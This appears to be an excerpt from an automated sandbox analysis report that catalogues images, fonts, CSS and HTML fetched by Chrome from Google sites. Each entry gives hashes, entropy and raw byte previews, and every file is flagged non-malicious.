                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................V........................!..1.."A.#2Qaq....3BRs......$SU.....%4brt......C....D...Tc.5.................................G......................!.1A.Qaq........"2...3Rr..B....#4Sb...$s.C.5c..............?...J.E..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.DE..DQ.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):36652
                                                                                                                                                                                                                                                            Entropy (8bit):7.976315730771684
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:/oMHf8nLpkkVf72Yx1cPucDLrRILCC/MAo1Tqp7j2f2R52Znw:/oqUnCu53tc3OqNe7j282Zw
                                                                                                                                                                                                                                                            MD5:B6EB5D1049A40925638EA6641752FFAE
                                                                                                                                                                                                                                                            SHA1:D40AD337CF2578FB183E9729C39BFA1D16EFA1A7
                                                                                                                                                                                                                                                            SHA-256:80117705B74B02E5660D4470437074437E003C5FEF9FBE6EE2255740EA7576C8
                                                                                                                                                                                                                                                            SHA-512:6941CA9BB2F64DE83FD4A731615AE909F1213EE688B80E5FB6E4421FAA2DBA2197591A6ED0FDCED8B4B7BD5E16686E0972022AAD2EB593A57FA3EF310AF9E144
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ...............................................L.........................!1..."AQ..a.#2q.BR...$3b...Sr....Ccs..4Dt..5u...%................................7.......................!1.A..Qa"q..2....B....#3R.b.$S............?...3.%.t6_.j.....*-..LiI...c..4\A@.[P.!.QV|.2.J.,..!Z6K.[.H..."...2i.....6..e..2.jX.O.:o.I.g.).f..v=]#....Sd.K...H..i.4...X....@-..........{,&q.Z..)Z.Q.>.T..._..^..........o.K..gk...1.....C....iM.|.'......4.Qm.4F.c9........a....C....xd.N....P.7.^0C....0...V7X.A(..d.`.'.gWm.....k...MN.i......7......DdP...r..!...%zS.*>.<.5.D.i....z.............jzP.%..H.H.M..".3....P.......*.......8.......D.=9.B..*)...B.l.x.H..z....l..........h....A......*:..b..&.{P1.f.s(.#'.....m.....Y.R)..4....v.V..#...Z.;.....&P.K0...h[=...Z:..x..|.R.!u.t.b..@...K..H...\D.:.."..h.PJ.I!I.E.....U.geY.T5.T].j..nK....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 660 x 264
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):874802
                                                                                                                                                                                                                                                            Entropy (8bit):7.842651135436318
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:aFc9QSWqyjjQqdU7DulAwuFxOPOj3ACepWpebd4S4:7FKjjQnb+QYWpIOS4
                                                                                                                                                                                                                                                            MD5:5706D0BEFE37D6D57BC8E9EC37A5E761
                                                                                                                                                                                                                                                            SHA1:65B76F76984034483ACA5A69B8E7ACEBDA317A4E
                                                                                                                                                                                                                                                            SHA-256:377DE5D78C7D84F76A4CF8B9E81B11C9D7EA256B7C354DFABB1775F0D9DF6071
                                                                                                                                                                                                                                                            SHA-512:272FC5D23EF67C619A132C79E32259CF6065947580F549B6CD6CC38AF67EE522AB177050E09CEB0FA9159393030C7CCE8E379EB444AD863DDC1BF63AE8D8DA97
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a.............!..NETSCAPE2.0.....!.......,...........D..!.......,...........D..!.......,............a.h....C..E.,N-..G...Fi..!J.#..C..c..2.f...2....Hl....6..$i..f.4.!R.=S...'.g.T...4e.5.....Aa:t.+D.....S.4b...G.C.AhW.$w.d...gIu.....&.$..:....... S..T.>w....&A.....b.q..u...,.Uv.Ge..+x..w...8O|..]^....8!<...U.J........3.6U.$Q.d.......V.0.."X.H.....3z2J....Ec..D..;.B]z....-.....[.-l.s......*hO.. =}.[.;\..8z.4.3r...h.......L.`t..=.Er.. !..v..8.;....-k..,..*|.=..L.8S....8y...z.....2@.7D@....87d.y...Npu*r....6..|..u.r....GF*'(r.._n.)?i.....v..FU7......Zr.r..X_o3l.56/5a..%;9Q-o..........n..Fjh...l...F_e~.*7..<........~..Tkd...)Z.3Hz...Ic.Jw....s......*_.0^...&...O|./L...wJk...9@Z.......#y....I\....J.,...7..Y.......3....Ygz..j.....W.....t....8nv...?..H..i...@Ux.K.\..Avy8h._..<j|.#..5.av.Vs..D....J.v...I.Jr.....)\!M..:p....$H.b.......3R....v...C.......H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1200x800, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):123301
                                                                                                                                                                                                                                                            Entropy (8bit):7.9841684449994235
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:nVzIzD52Knf7lM67qEUsPSZ1jnbam3HAcy6z6iP:8/fpM6qsPSLB3AcDP
                                                                                                                                                                                                                                                            MD5:8AF3084617BED6C6DC5E61D37C41EFFF
                                                                                                                                                                                                                                                            SHA1:34BC14013B4076982ED1E77BF8E5627802793E92
                                                                                                                                                                                                                                                            SHA-256:34E4C75461D5AC35F526D61B690D284A7B925D891D90112D45DC3FA5C8C26B44
                                                                                                                                                                                                                                                            SHA-512:78005C9041793903055F593E91612C7824FB10944F2CD7D55ECE52F2BB92DDD0D57D8C9AE4C48D63FC9E5B3C46C74BEC42DF3B45DADE2B4F94BE4596ECD22BBC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ...."..........................................N........................!1..AQ..."aq..2....BR...#$br...3.%S&4Cc..s5....d.6DT.................................>........................!1.A."Qa.2q.#....3R..$4Bbr....%5CS..............?..$...j?.b.V........&.2H.._......T.U.....]Wk[%.=Vm.}P....]Qf...^X..t....S&.J$;.(...cF.. o.hp....Y+.|#Q.......i.....n....C.,.in..|t.K.NfEz8+..#y5Q..(..I.Y..X.....x[OF.o).......-...yL.&~.m...U...T....c..4?x.4.....\..`.R..9...^..*...qN....&(..gI...]....#.aI..-....&..>..._..v.Q..Sh.w..?.......hO1.}...^.<...R.Ovk...8.k..P...S..q..!..56).Y..YQ..Q..X..S&..K.....Z.......`~...{..^.uk.E.I..>....-..5.F.....zZ..G...<'....././R...V-..k.6<s.|.........../hU.....&.D.w..x.Y.....f.l.{.....dF...-.b.%..@@!(.bX9).8.kr[gE....R. `-..syG.>.e.._TUu.....z........+../.(...w.|3W..W7o./....I
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1243
                                                                                                                                                                                                                                                            Entropy (8bit):7.764338808957871
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:fIFoo0SJzhxjOgoq5xzlffQBhNFbJ1zj60REG196qzFQG9yAWkZZ7:fIF+OhxjOsxzNfUhrbbm0nr6qzFXZ37
                                                                                                                                                                                                                                                            MD5:27E14AF9A504929C69C6A1B8A91A9177
                                                                                                                                                                                                                                                            SHA1:F57FEC734B6AAB9644D9DBDE2E1F33341E5A3FEC
                                                                                                                                                                                                                                                            SHA-256:4258CA4E92E2A88E6677FECA5369BFA95D370C66B665EF0C74CC9CCC7E864086
                                                                                                                                                                                                                                                            SHA-512:41E0AE9088E3410BF06F8056C4C42EFAE92C3B8AAFCD59FE821CD82C36EAC0F84C9ACB8C32822902CB9879571D664CE2D8E7BC0100287677C05794566A8FD871
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR... ... .....szz.....IDATx...vcG.@..l.....d.afffF.03...1...'..'.S......%..>..{.....+..^.|8.h.|...?..#A..q......HG.Y...~Y>..B..e.=|....a....w~.L.B.......s...py....-{....p.... ...C.?..q{..?.xQN.u..%N.$...p....`tBgg7twwCWW..>...........n..<@...z A...=..d...w.H...}f....F&.^....Z9T.?...>...q.y........O.I.....waM.......@......I....n..;.c_w]...Ey..g.P.7..b....Q..@.........p.< Z....Uh....v..".|..$...`[..E...")..y.q..jjM`c....."..b_.I8B..{.S!....TX.\..Xv..+..`......p...8..QD.... .}...`.=I..r....*.N.x..lS...J...0...>..E.t2....,.....$...7.\........7.A9....j-$g.BVQ.d..Bnq.....'Qw.>...Ae.q...` ....C..q.....". y$c..|....yE`....tB....K..:.x...hwC...$_..Dg..+,^<.X...D.F.S7.`.6%.V..Y.=.{O]A..E.|...5... C....O..C.q..........bU]=P...cp....r"....s..._..w..A|..EW..... .B.1.A..gD.$<.+.foU....T_...*(.G466.u.w@D(TADy....>.c..`Va.,d'...#x........".P..~...aEe=..V.)..E{4..p..U....f!@!...P...). ..<LA.....:.7X.f.CNI...0=G.hhh..0C..^.aoY.R......E.a..I}.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):181
                                                                                                                                                                                                                                                            Entropy (8bit):5.052245007941961
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:qTCJLxoRucN+OjTcvXjXRH0DDmJS4RKb5KVEriqGQcFFuIOUoLRFQcRUlypqURL2:qTCJFou1i3mc4slTHmcIgtbNRLprTY
                                                                                                                                                                                                                                                            MD5:10C8AED69BDAED5FA3120401608F0899
                                                                                                                                                                                                                                                            SHA1:6E5A7025855BFB087B556203D18D24843EBBF804
                                                                                                                                                                                                                                                            SHA-256:6F62D85EF6ED53BC368C77B6A47394A41F3B16D9E07D0B8761E726784EEBCEB4
                                                                                                                                                                                                                                                            SHA-512:E2BAD6E1B1AF68AB4511264A4A8506FFFC4B07936BA3D1C5E809926E7E1741AA0DC1E7991848BD21380F12C962E6C6A7BA74FE82FE24EE762AC736A1DE29B045
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-stories-2021/img/glue-icon-expand-more.svg
                                                                                                                                                                                                                                                            Preview: <svg id="expand-more" width="18" height="18" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 288, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):136806
                                                                                                                                                                                                                                                            Entropy (8bit):7.986761461779284
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:MBGfB4brAOEgELzZa1dI2dvTSuxhogqZ250+7LGt02s8+C8:M8GHAHtU1dIMLSmhraapLGtV4
                                                                                                                                                                                                                                                            MD5:B85D38C87C79771D08680FA4D1F04D66
                                                                                                                                                                                                                                                            SHA1:3DD5BF8F30F74D147AA26F026DAB32B9F19BF8C3
                                                                                                                                                                                                                                                            SHA-256:20CB972F24DCA2A9769A1D4AA905D09354F3D5B92EE378ED23CBF1BAEEC66DCB
                                                                                                                                                                                                                                                            SHA-512:77375FAE62F974BBFC112130B6DC39DBAD3F13A6ED2A9E5265AB288D634A1283C6032004B60F7A713D434399377B9A1DAAA847766E249D847AAF4B46B590A6DA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR....... ......<.Q....sBIT....|.d... .IDATx...,..........9....E...m.t.2..-...XCM4...&.i*.d..1.n..XE.!....g7........hXd..$.t...'22...w.........{.......Z..p.?2;...;...G...../DD.g.....G..j...o...`.;.....Q... .....9....3>....=..98..}.MD.......`.......#8...v....`..;...;...v..}.-.........6.C...O.o......s.m.......v...>...|.....9.oZ..:..N.]8.o....y..`.;....%....`.;....v@......p...n2..?..}.q.....;....v.....!....9..v.?.~..@..7..oY.....}.;..........m.^w6.s..`...@.-S.o..?|..t,.....J....T..-.....7..k....v.....r)_...siW."".j.{.'@..a.RK...k...I.;.o9..<...v.........L.VwN..~.....}..........7A.m......P.......wg....\u.t..X.o..|.D.c......R...=0...:....\;.qw_jA.J;.......]...~..4+B..j%.+..~<.......4...o.(|{px....`..;...H........;`_.`....t...$U.....;..,{6m.W..^.UQ..B..!.w..oQs....l..9....../+.0E<..%+G.....v-5......jAJs.g.dJ...P.......T..V.]+....P+.....P=.......{.z9....v.........k.......i...[....Q.O..E...{.!7'"-8...X....6.BDPQ..l.V*.......$...e..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 1000 x 400, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):189454
                                                                                                                                                                                                                                                            Entropy (8bit):7.99575455409089
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:rOxDJI4LjsiNQSWqp0hr2J9ljypPu7GkF+MpkNXlxilsZavB3icpfp9cSB14Z4Zs:cDvPpQSWqpyajIBkYvXlxilsk5icpfpM
                                                                                                                                                                                                                                                            MD5:207F6CA14D98109B76B9D4CBDF33B0B2
                                                                                                                                                                                                                                                            SHA1:A6B6C3161836CE3816084C070437F997A9B155D3
                                                                                                                                                                                                                                                            SHA-256:3C0E6F7C814E00574706C951B2313411D49250DBBE20338FB13CED696A0F2CC3
                                                                                                                                                                                                                                                            SHA-512:0881505C2BC18B7B1C9CA6D8A7847CBC89351F317C1F47B7D8204DF2639BE9F48C0DC94CF9EB1A0DBDB1514C802150C88AC769E396EA2026EEAFBCCEAC47EDEF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR................S....PLTE......................................................................................................................................................................................................................................{NG>...wvuEB>.........=6,:3+ .....ea\=81`YR............($.IA5C<1...qmh..r....uiZPBME8.........A9...~^RB]TGrh\71(1+#$ ...........{o.rbRPO4.&...xl[.....ttgU..y..ph\KpdT......-'!j^N...m_LmaPbWG...pbP.q[eYIwgSUL?..v.ygxjV...YN?..nLB5...F>3|o].........QG9SI;aUD......VK<.......t^seQ|mX.zd..{..n.wa.}j.}f.....j..w..v..y..r..z...................................~.........................................................................................~..................................................Z.G....IDATx...Ub.0..`SM.QV.)v..%...|............................... .....Q...(...$.O.t<.D.8...3_x..a.{......(..0..4...z.@.d.78...TY^.....FnUy...Re.....9=...8#k..nE....9..............
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 550x220, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):58040
                                                                                                                                                                                                                                                            Entropy (8bit):7.967406093557375
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:1eE8Ve3xt1CVslBbsReDhZP6J+aepA7aeP:1V82YVsboI/kvieP
                                                                                                                                                                                                                                                            MD5:722623C3B5E4A1CA8FCC9F6C2A323192
                                                                                                                                                                                                                                                            SHA1:43C0CA341DCEC858F834E9D2729D1A1A5AE75683
                                                                                                                                                                                                                                                            SHA-256:EE54DA4C64E188578802FBEBC4586F58B0DA9AB69DBDC44169EC465DF6DB8499
                                                                                                                                                                                                                                                            SHA-512:1E2871927D3486E2BE5ACB6E38A0DF563CE5069CF59852F0591980264E04966B6305E524DFB533923944C583977469914F78D19CEA2513B04F66523709D3482E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2015/cricket-world-cup-2015-quarterfinals-3-australia-vs-pakistan-5655610641088512-hp.jpg
                                                                                                                                                                                                                                                            Preview:................................................................................................................................................&.............................................................................................!...1.AQ".a...q2#...B.R$.....b.3.r%4...CSsc.5.......................!1..AQ.aq".......2..B#..r3..Rb.$....C..Ss.c4T%............?..........X.AY...../{...T.=..T....T.....T.u..........^x.A{Q>8*......T...z....i.T.....T.....T.u.<......U._p.....*kW..P^.<.PW{...P.....^..+u. ...,..K.X.*{.....g...g...p.` ... ... ...S-..../u.jW.....PQ]|..T..b..z.QQ.p..X..o.CH* e.2."K."..~..r.l..{...F./72.)..o..Ju..T...(*2..b..s{N...5...p....1'..3...u..[.a..e..2..I...JKI.d..m..Tt=s..._.....~...Q..OrY.m..;.....W~E.|..tS+~"y\.#j."E.....AQ SN...;..H<d.*.f.7....8..Mp.....l..Ri.........^....]R..+.r.5..C.V.Ms.p.p."I..TL.EO....)D&<.~..k...0:..T.^v{.0.0.)D...rW.k...<.}s.\.....k.\.....k.{.....L..@.y...$..'..(u.5.\].....JP..T.....,..C.y.......+.....9..\\..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (7886)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):32788
                                                                                                                                                                                                                                                            Entropy (8bit):5.793616372724006
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:ZuEghhvpuHRfX5uuqc2aFfoBjrWiaZuw+rGRIDJnavWPuMO7OucQPFJ/N4v2/noM:XfX5TpjB+11PJUf1DoVN8
                                                                                                                                                                                                                                                            MD5:F12A1802944233902FBBA73784C5989F
                                                                                                                                                                                                                                                            SHA1:95BA3E8EB36BF651C9AA0818D5DC6ECBD24A1748
                                                                                                                                                                                                                                                            SHA-256:20C862D426BC805D973C5C0379224A381AEE80295D72383945287880A3C6D14F
                                                                                                                                                                                                                                                            SHA-512:CC36127EC6EDC7EBE9BD33B3B7628A33540C41CFDE149DF00390113CF51D5F7135BA1B6850D45BC7FD6FBC02531B2044A9BDCE5ABABEE040892CFD29428BFCFF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://ogs.google.com/widget/callout?prid=19022645&pgid=1151720448&puid=723e1a40d4cc6173&cce=1&dc=1&origin=https%3A%2F%2Fsupport.google.com&cn=callout&pid=117&spid=117&hl=en
                                                                                                                                                                                                                                                            Preview:<!doctype html><html lang="en" dir="ltr"><head><base href="https://ogs.google.com/"><meta name="referrer" content="origin"><link rel="canonical" href="https://ogs.google.com/widget/callout"><link rel="preconnect" href="https://www.gstatic.com"><link rel="preconnect" href="https://ssl.gstatic.com"><script data-id="_gd" nonce="MJb62wrOQfEIi6mKj0pQXQ">window.WIZ_global_data = {"DpimGf":false,"EP1ykd":["/_/*"],"FdrFJe":"-4357536398048830313","Im6cmf":"/_/OneGoogleWidgetUi","LVIXXb":1,"LoQv7e":true,"MT7f9b":[],"MuJWjd":false,"NrSucd":false,"OwAJ6e":false,"QrtxK":"","S06Grb":"","Yllh3e":"%.@.1679349464585635,173067870,973364283]","ZwjLXe":117,"cfb2h":"boq_onegooglehttpserver_20230314.03_p0","eptZe":"/_/OneGoogleWidgetUi/","fPDxwd":[1763433,1772879,45814370,47977019,48410021,48504704,48642514],"gGcLoe":false,"nQyAE":{},"qwAQke":"OneGoogleWidgetUi","rtQCxc":0,"w2btAe":"%.@.null,null,\"\",true,null,null,true,false]","zChJod":"%.@.]"};</script><script nonce="MJb62wrOQfEIi6mKj0pQXQ">(function(){'
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 660 x 259, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):29482
                                                                                                                                                                                                                                                            Entropy (8bit):7.981667322512288
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:9GTC2+KFoZgqPDaPRRBS3e0OWGEllG+NOgNL34IQoJtcn:YTP+QofiRRBrHWVloU134Ipe
                                                                                                                                                                                                                                                            MD5:5E8C4E7B94C84AC6741F0B4F6B6494DD
                                                                                                                                                                                                                                                            SHA1:ABF9239240DDE7DB62AA7DBA97AF4EE578B3D901
                                                                                                                                                                                                                                                            SHA-256:AC2C69E9F7D74922F4B623DCF8B6352E3AD580FF6195B3693EA8446D99B9BA66
                                                                                                                                                                                                                                                            SHA-512:F54CD3D4F04B57487C8D48E412383707D002AA0EB828793AB443FA0B450883DCF805A75F876888BABA8CAAB766B9CE6E49CA5717E7F461C088C670EF587B70B4
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/jptdNkprZQo-Qp7UYK4_eMxLzzXWgTIJsIKCVg2Um9jDxtiu0FAPqLkTXl5ZQvgfHNaZliSPsrrtY6tXAB7tb-gwsF9-vs_natxpaLNVCw=s660
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............&......sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2.. .IDATx...w|..........%.....$.".T@..a...(V.w..._.....;(.b.........M%......T.&.{%...?$..L....gH.....0..$....`..a..~X.f..a...7.0..$.....a.&....0..0...o.a..I0,x3..0L.a..a..a......0..`X.f..a...7.0..$.....a.&....0..0...o.a..I0,x3..0L.a..a..a......0..`X.f..a...7.0..$.....a.&....0..0...o.a..I0,x3..0L.a..a..a......0..`X.f..a...7.0..$.....a.&....0..0...o.a..I0,x3..0L.a..a..a......0..`X.f..a..#....hP....0...:.....$.m.M.!.7.a.D..7..@.....Q.........]~...q...Jl6.t..@..............Dh(Dkj.....^m....."h...N..6~.0.........}..E....|~..;......d....k...ZT......(....7.~....x...3../.0L.#.X..a.....O....Z.....M].xw*..B.Zy.ZQ!..*.W+..P.. h.l;x.#g....o............../>.\...d..i.WQUQ...f.U>|..A.R3`c.l.....0uF..b.R....-..1.mK.X7.0h m....[.Y.d-A.<.n..0.a..a....>....Lx.r.y......f...D.u..s.IOM .#..g...0.b..a.L..h'..G.d...k.3.x"Y.C?..y
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x330, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):52211
                                                                                                                                                                                                                                                            Entropy (8bit):7.916277691672813
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:eaJw03BzzN9TW/q2yiLadBem+t1GPJ15petmb+yN:eaJwCBHN9TNhZmxzGPJ15prN
                                                                                                                                                                                                                                                            MD5:EBB73531F819F8677B9A9807E4FB5890
                                                                                                                                                                                                                                                            SHA1:0E7DCAFBFB73D2151DD15B6A9783DF9B5D9C0E4C
                                                                                                                                                                                                                                                            SHA-256:697EA7CC49EE19281AE757A1381348CDB680B9F20023D238AA5E47A34CBA35BC
                                                                                                                                                                                                                                                            SHA-512:DDE2596F269D35225827BC64095D5418451672CC18B28206EBC60EC05E7B16B08E090F9F4FC7FD3974521FE5E035B12E0D39A8552F5110189A6C9B2B07E45A12
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/bT4TRpcZTcPqGbDgGXBdUty2CyQ_sJtQ4s-64-SRkkZw3fObWd8EpEyxljydj79TDBZZD3Q_lHXDkxbdQWx443udWcpnpzexSkSxGD42GA=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Referen
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):31497
                                                                                                                                                                                                                                                            Entropy (8bit):5.535511296860141
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:52e1QByBfBAB1B0BuBWAWdKeNqw5KrB+m4Kt2itt73AJDKM:52A
                                                                                                                                                                                                                                                            MD5:560066E10766632B7739DCBF0AE72187
                                                                                                                                                                                                                                                            SHA1:0F341BB24401B243BF12D9F532EC475C091FB60F
                                                                                                                                                                                                                                                            SHA-256:6E3775E25A2425F5F46BCAF622ED84A706B611407F5036579EC25EAC300B3D43
                                                                                                                                                                                                                                                            SHA-512:DC5D122BFE6C8BBE8B4F2F10205316F13118F8455387BD8CDFCB245597890AC55F54E7CF646E689378A8D7DC869E2FDEB25D6C94FD72A5FD2B12470E52A5A93B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700|Google+Sans+Text:400,500,700,400i,500i,700i|Google+Sans:400,500|Google+Sans+Display:400|Product+Sans:400&lang=en"
                                                                                                                                                                                                                                                            Preview:/*. * See: https://fonts.google.com/license/googlerestricted. */./* armenian */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiIUvaYr.woff2) format('woff2');. unicode-range: U+0308, U+0530-058F, U+2010, U+2024, U+25CC, U+FB13-FB17;.}./* cyrillic */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjYUvaYr.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* devanagari */.@font-face {. font-family: 'Google Sans';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjMUvaYr.woff2) format('woff2');. unicode-range: U+0900-097F, U+1CD0-1CF6, U+1CF8-1CF
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
